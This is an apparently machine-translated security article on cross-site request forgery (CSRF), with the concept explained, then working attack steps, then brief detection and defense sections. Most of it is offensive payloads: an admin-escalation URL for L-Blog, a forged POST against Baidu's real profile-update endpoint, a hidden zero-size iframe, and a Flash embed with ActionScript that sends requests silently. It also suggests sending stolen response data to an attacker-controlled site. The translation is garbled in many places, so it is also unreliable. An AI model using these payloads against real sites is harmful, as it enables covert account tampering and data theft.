0x01 what is a CSRF attack
CSRF is the abbreviation of Cross Site Request Forgery (XSRF ).
The meaning of forgery is to perform GET/POST operations on a CGI in a user session.
You may want to hijack HTTP sessions.
The website uses cookies to identify users. After a user successfully authenticates, the browser will get a tag
If you do not close your browser or log out, this cookie will be included when you visit the website later.
Cookie. If the browser is controlled to request the url of the website during this period, some users may not want
Such as modifying personal data ). This is not the request that the user really wants to send.
The request can also be submitted from a third-party website, so the prefix is cross-site.
For example, a bbs can map and write the login exit link in the URL of the texture.
This post will be logged out later, because the user has accessed the logout login link as his identity. In the user's opinion, it is a post.
There is a problematic "image" in the sub-account, instead of logging out, but the program will think that the user requires logging out.
And destroy the session. This is the legendary CSRF attack.
Don't underestimate CSRF. Remember that L-Blog had a CSRF Vulnerability (I didn't know this concept yet.
Read: p), it adds the Administrator is such a link: http: // localhost/L-Blog/admincp. asp?
Action = member & type = editmem & memID = 2 & memType = SupAdmin.
The administrator can access this URL. The Google CSRF vulnerability [1] will cause email leakage.
In addition, do not think that only XSS can generate worms. as long as the conditions are appropriate, CSRF is also possible.
0x02 Where are threats from?
Paster is only a GET method. In many cases, we need to forge POST requests. One way is to use cross-site,
Of course, the target site may not be cross-site. In this case, we can launch attacks from a third-party website.
For example, if I want to attack a problematic blog, I should leave a message on the target blog and leave a website address to lure the owner.
People click here (this depends on your flickering skills: p), and then construct an HTML form to submit some data.
The Multi-Window browser is helpful.
Multi-Window browsers (firefox, roaming, MyIE ......) Convenience also brings about some problems, because multiple windows
The new window in the browser has all the current sessions. That is, I used IE to log on to my Blog, and then I want to watch the news.
Again, run another IE process. At this time, the sessions in the two IE Windows are independent of each other. Please
When the Blog is found, there will be no cookie for my login; but there will always be only one process in the Multi-Window browser, sessions in each window
Is common, that is, when a request is sent to the Blog in the News window, the cookie that I log on to the blog will be carried.
Think about it. When we use the mouse to click a link left by someone else in Blog/BBS/WebMail, maybe it's a match.
The well-prepared CSRF attack is waiting for us.
0x03 initiate a CSRF attack
From a third-party site to use POST to launch a CSRF attack, the form is automatically submitted to the target CGI using Javascript.
It is not convenient to write forms every time. The auxiliary tools include xss post Forwarder [2] and CSRF Redirector [3]. Here I also wrote the corresponding ASP version [4]. When using this function, you only need to pass the submitted url and Parameters
If you give it, it will automatically POST it to the target.
For example, I want to submit some data
Asp "> www.0x54.org/a.asp:http://www.0x54.org/lake2/xss_post_forwarder.asp?
Lake2 = http://www.0x54.org/a.asp&a=123& B =321&c=%26%23%25
(Here we need to consider URL encoding)
But in actual attacks, you have to think about how to trick users into our web pages.
0x04 one instance
Because CSRF is not as eye-catching as XSS, it is still very difficult to find a Web application with CSRF
Easy. This time our goal is Baidu, just for test.
In any way, let a user who has logged on to Baidu access this URL:
Http://www.0x54.org/lake2/xss_post_forwarder.asp?
Lake2 = http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1
& Email = CSRF@baidu.com & sdv = & zodiac = 0 & birth_year = 0 & birth_month = 0 & birth_day = 0
& Blood = 0 & bs0 = % C7 % EB % D1 % A1 % D4 % F1
& Bs1 = % C7 % EB % D1 % A1 % D4 % F1 & bs2 = % CE % DE & txt_bs = & birth_site = % 3B % 3B
& B % 3Drs0 = % C7 % EB % D1 % A1 % D4 % F1
& Rs1 = % C7 % EB % D1 % A1 % D4 % F1 & rs2 = % CE % DE & txt_rs = & reside_site = % 3B % 3B
Then, check whether the personal information of the person has been modified. This is a bit depressing, when the person visits the URL and then browses
Will return to the data modification successful page, we will be found. Is there a way to prevent the browser from refreshing?
What about it?
Yes.
One way is to use iframe to construct such HTML code:
<Iframe width = 0 height = 0 src = "http://www.0x54.org/lake2/xss_post_forwarder.asp?
Lake2 = http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1
& Email = CSRF@baidu.com & sdv = & zodiac = 0 & birth_year = 0 & birth_month = 0
& Birth_day = 0 & blood = 0 & bs0 = % C7 % EB % D1 % A1 % D4 % F1
& Bs1 = % C7 % EB % D1 % A1 % D4 % F1 & bs2 = % CE % DE & txt_bs =
& Birth_site = % 3B % 3B & B % 3Drs0 = % C7 % EB % D1 % A1 % D4 % F1
& Rs1 = % C7 % EB % D1 % A1 % D4 % F1 & rs2 = % CE % DE & txt_rs = & reside_site = % 3B % 3B "> </iframe>
Another way is to use flash.
0x05 CSRF With Flash
Flash can submit data to any URL, open pirated Adobe flash CS 3 Professional, new
Create a flash file (ActionScript 3.0), right click on the default layer to select the action, and then run the following code:
Add:
:
Import flash.net. URLRequest;
Import flash. system. Security;
Var url = new URLRequest ("http://www.0x54.org/lake2 ");
Var lake = new URLVariables ();
Lake = "a = lake2 ";
Url. method = "POST ";
Url. data = lake;
SendToURL (url );
Stop ();
Export as a swf file, access it, capture the package to see the effect:
Html> http://www.0x54.org/lake2/flash/test1.html
It is very troublesome to write as and compile swf every time. According to the CSRF Redirector idea, I wrote a similar
Flash program [5], and then try Baidu to access the webpage with the following HTML:
<EMBED src = "http://www.0x54.org/lake2/flash/flash_hacking.swf?
F = 1 & t = http://passport.baidu.com/ucommitbas
& D = u_jump_url % 3D % 26sex % 3D1% 26 email % 3DCSRF @
Baidu.com % 26sdv % 3D % 26 zodiac % 3D0% 26birth_year % 3D0% 26birth_month
% 3D0% 26birth_day % 3D0% 26 blood % 3D0% 26bs0% 3D % 25C7% 25EB % 25D1
% 25A1% 25D4% 25F1% 26bs1% 3D % 25C7% 25EB % 25D1% 25A1% 25D4% 25F1
% 26bs2% 3D % 25CE % 25DE % 26txt_bs % 3D % 26birth_site % 3D % 253B % 253B
% 26b % 253Drs0% 3D % 25C7% 25EB % 25D1% 25A1% 25D4% 25F1% 26rs1% 3D
% 25C7% 25EB % 25D1% 25A1% 25D4% 25F1% 26rs2% 3D % 25CE % 25DE
% 26txt_rs % 3D % 26reside_site % 3D % 253B % 253B "> </EMBED>
(Pay attention to URL second encoding)
In this case, do not only send requests. In fact, flash can get the returned content. If the returned content has sensitive information
Then, you can read it and send it to the Web controlled by us. Of course, it depends on whether the target site allows flash
Cross-origin retrieval.
0x06 CSRF Detection
The CSRF vulnerability is detected to be physically active. capture a normal request packet and remove the referer field.
Re-submit the job. If the job is still valid, the problem basically exists. Of course, the parameter may contain unpredictable parameters (such as userid or something). It depends on whether this unpredictable parameter can be used by other means, such as flash.
If yes, there is still a problem. Also, try to change post to get, because some programs do not
Differentiate get/post.
The functions and responses of applications are different. Therefore, it is still difficult to automatically test the CSRF vulnerability.
OWASP has a tool named CSRFTester. You can try it [6].
0x07 defense CSRF
WAF defends against CSRF vulnerabilities on the Web application side. Generally, referer, token, or verification code are used. Nexus
The article [7] has been fully written; superhei has also proposed the bypass idea [8]. Please refer to their article.
Another idea is to defend on the client, which seems to be similar.